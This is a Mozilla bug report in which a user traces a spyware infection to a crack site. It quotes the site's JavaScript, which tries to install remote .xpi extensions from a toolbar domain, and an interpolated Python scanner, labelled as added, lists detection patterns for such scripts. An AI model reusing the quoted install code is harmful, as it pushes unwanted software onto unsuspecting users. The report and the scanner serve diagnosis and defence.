[security] Site starts up IE and installs spyware

Status: RESOLVED INVALID
Product: Core
Component: Security
Priority: --
Severity: major
Reported: 13 years ago
Last modified: 13 years ago

People

(Reporter: Laurens Holst, Assigned: dveditz)

Tracking

Version: Trunk
Hardware: x86
OS: Windows XP
Points: ---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:needinfo])

Attachments

(3 attachments)

(Reporter)

Description

13 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050223 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050223 Firefox/1.0+

If you go to the cracks.am site, at http://www.cracks.am/d.x?65093 (excuse the
illegal nature of this link), it will open an IE window and install spyware.

I think it's probably doing something with JavaScript, that's why I filed it
into this category, but I really wouldn't know (and don't feel like finding it
out myself at the risk of getting infected with spyware time after time after time).


~Grauw

Reproducible: Always

Steps to Reproduce:
1. Have IE installed on your computer
2. Go to http://www.cracks.am/d.x?65093
3. Get infected with spyware through the opened IE window
Actual Results:  
Spyware got installed. Amongst others SideFind, CoolWebSearch,
Performance-something and more (iirc).

Expected Results:  
I should be able to surf securely and safely.
(Reporter)

Comment 1

13 years ago
The offending JavaScript code seems to be this:

else {
    if (!(GetCookie_protect("exelimiter") || exelimiter)) {
        if (bname == 'Netscape') {
            if (InstallTrigger.updateEnabled()) {
                InstallTrigger.install({'Content Access Plugin 1.01' :
                    'http://www.xxxtoolbar.com/ist/softwares/v3.0/protect_regular.xpi'});
            } else {
                location.replace('http://www.xxxtoolbar.com/ist/softwares/bundlers//istinstall_regular.xpi');
            }
        }
        else {
            location.replace('http://www.xxxtoolbar.com/ist/softwares/bundlers//istinstall_regular.xpi');
        }
        SetCookie_protect("exelimiter","1", 0);
        exelimiter=1
        setTimeout('location.replace(gurl)',10000);
    } else { location.replace(gurl); }
}

It seems to try to install an XPI.

Now that I mention it, I do recall at some time having been prompted with an XPI
install window on that site. I never clicked OK though! - I clicked on the [X]
close button, but the XPI was still installed! (apparently it still and really
is - wonder how to get rid of it)


~Grauw
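A triage aid for captured page scripts like the one quoted above, added here as an example and not part of this bug or of Mozilla's code: it flags the drive-by pattern the snippet shows (an InstallTrigger.install call or a location.replace straight at a remote .xpi, gated behind a "limiter" cookie). The sample script and its example.invalid host are constructed for the demonstration.

```python
"""Flag drive-by extension-install patterns in captured page scripts."""
import re

# Patterns drawn from the behaviour quoted in comment 1: a script that calls
# InstallTrigger.install with a remote .xpi, falls back to redirecting the
# browser straight at an .xpi, and gates repeat attempts behind a cookie.
PATTERNS = {
    "installtrigger_call": re.compile(r"InstallTrigger\s*\.\s*install\s*\("),
    "xpi_redirect": re.compile(r"location\.replace\s*\(\s*['\"][^'\"]*\.xpi['\"]"),
    "remote_xpi_url": re.compile(r"https?://[^'\"\s]+\.xpi", re.IGNORECASE),
    "cookie_rate_limiter": re.compile(r"(Get|Set)Cookie\w*\s*\(\s*['\"][^'\"]*limiter"),
}


def scan_script(text: str) -> dict:
    """Return each matched pattern name -> list of 1-based line numbers."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def xpi_urls(text: str) -> list:
    """Extract the distinct remote .xpi URLs, in order of first appearance."""
    seen = []
    for m in PATTERNS["remote_xpi_url"].finditer(text):
        if m.group(0) not in seen:
            seen.append(m.group(0))
    return seen


def is_drive_by_install(text: str) -> bool:
    """Heuristic verdict: an install call or .xpi redirect plus a remote .xpi URL."""
    hits = scan_script(text)
    return "remote_xpi_url" in hits and (
        "installtrigger_call" in hits or "xpi_redirect" in hits)


# Constructed sample modelled on the quoted snippet (placeholder host, not the real one).
SAMPLE = """\
if (!(GetCookie_protect("exelimiter") || exelimiter)) {
  if (InstallTrigger.updateEnabled()) {
    InstallTrigger.install({'Plugin': 'http://example.invalid/protect.xpi'});
  } else {
    location.replace('http://example.invalid/istinstall.xpi');
  }
  SetCookie_protect("exelimiter", "1", 0);
}
"""

if __name__ == "__main__":
    print(scan_script(SAMPLE), xpi_urls(SAMPLE), is_drive_by_install(SAMPLE))
```

Run it over attachment 176004 (the captured JS) to list the lines and .xpi targets to block at the proxy or in the install whitelist review.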
(Reporter)

Comment 2

13 years ago
Created attachment 176003 [details]
The offending HTML
(Reporter)

Comment 3

13 years ago
Created attachment 176004 [details]
The offending JS

I risked my life to get you guys the source of the offending page :).
(Reporter)

Comment 4

13 years ago
Created attachment 176006 [details]
The offending XPI
(Assignee)

Comment 5

13 years ago
If you're running Firefox this site shouldn't be able to launch an XPI -- you
should get the infobar at the top saying an install attempt from that site was
blocked. If you unblocked the site and then agreed to install something, well,
it was installed. Hard to protect against that. (I'll get back to the close
button thing in a bit...)

When I opened the captured page it also tried to install something using java,
popping up a big scary permission dialog. Do you have Java? If so, what version?
(check using about:plugins). I ask because we've seen similar sites take
advantage of a Sun JRE flaw in 1.4.2_05 and below to install things without
notice. The site appears to throw a lot of potential exploits against different
browsers so it *might* use the older java flaw in addition to the
straightforward privilege dialog I saw.

Back to the install close button thing. That would be a serious bug, obviously,
but not one I've ever seen. Are you sure it was an XPI that ran? If it did it
would leave a record in install.log in the installation directory (or your
profile if the install dir is write protected). Look and see what you find there.

Also interesting is your initial claim that it opened an IE window, and then got
infected through that. It would certainly be dangerous if something could open
an IE window, but there's no evidence of how it did that. Probably the IE window
was opened by the exploit itself after it was already installed.
Whiteboard: [sg:needinfo]
(Reporter)

Comment 6

13 years ago
Now that you mention it, a while earlier on that site, I had a Java popup asking
me whether it could install the software appear with the Yes button right under
my mouse cursor when I clicked, so I accidentally clicked yes... :/
(Reporter)

Comment 7

13 years ago
I uninstalled Java 1.4.0.03 and installed 1.5.0.02 and the problem is gone...

I'm happy to be rid of it, but there will be millions of users still using an
older Java version just like me. The fact that the Java download page is quite
cryptic for the ‘dummy’ user doesn’t help either, even I had trouble finding the
proper download package.

I can't help that a number of Firefox's main ‘security’ problems are related to
plugins. This, and I heard about Flash popups as well. Is there a plan to
address these kinds of issues?


~Grauw
(Assignee)

Comment 8

13 years ago
(In reply to comment #7)
> I can't help that a number of Firefox's main ‘security’ problems are related 
> to plugins. This, and I heard about Flash popups as well. Is there a plan to
> address these kind of issues?

Yes, we have plans to include plugins in the extension update service, blacklist
(disable) extensions and plugins with known critical vulnerabilities, block
plugins from opening windows, and more. Don't have all the bug numbers handy.

We're also looking into whether it's possible to block Java from asking for
enhanced permissions except for whitelisted sites. People could list their
corporate intranet apps and then not worry about malicious Java permission
dialogs popping up elsewhere.

Your comment 6 suggests the Java permission dialog might be vulnerable to
something like bug 162020, all the more reason to keep it from coming up.

Since the spyware was installed after you gave it explicit permission to do so,
albeit mistakenly, this bug ought to be closed. Rest assured that we are
addressing the related issues in other bugs, though.
Group: security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → INVALID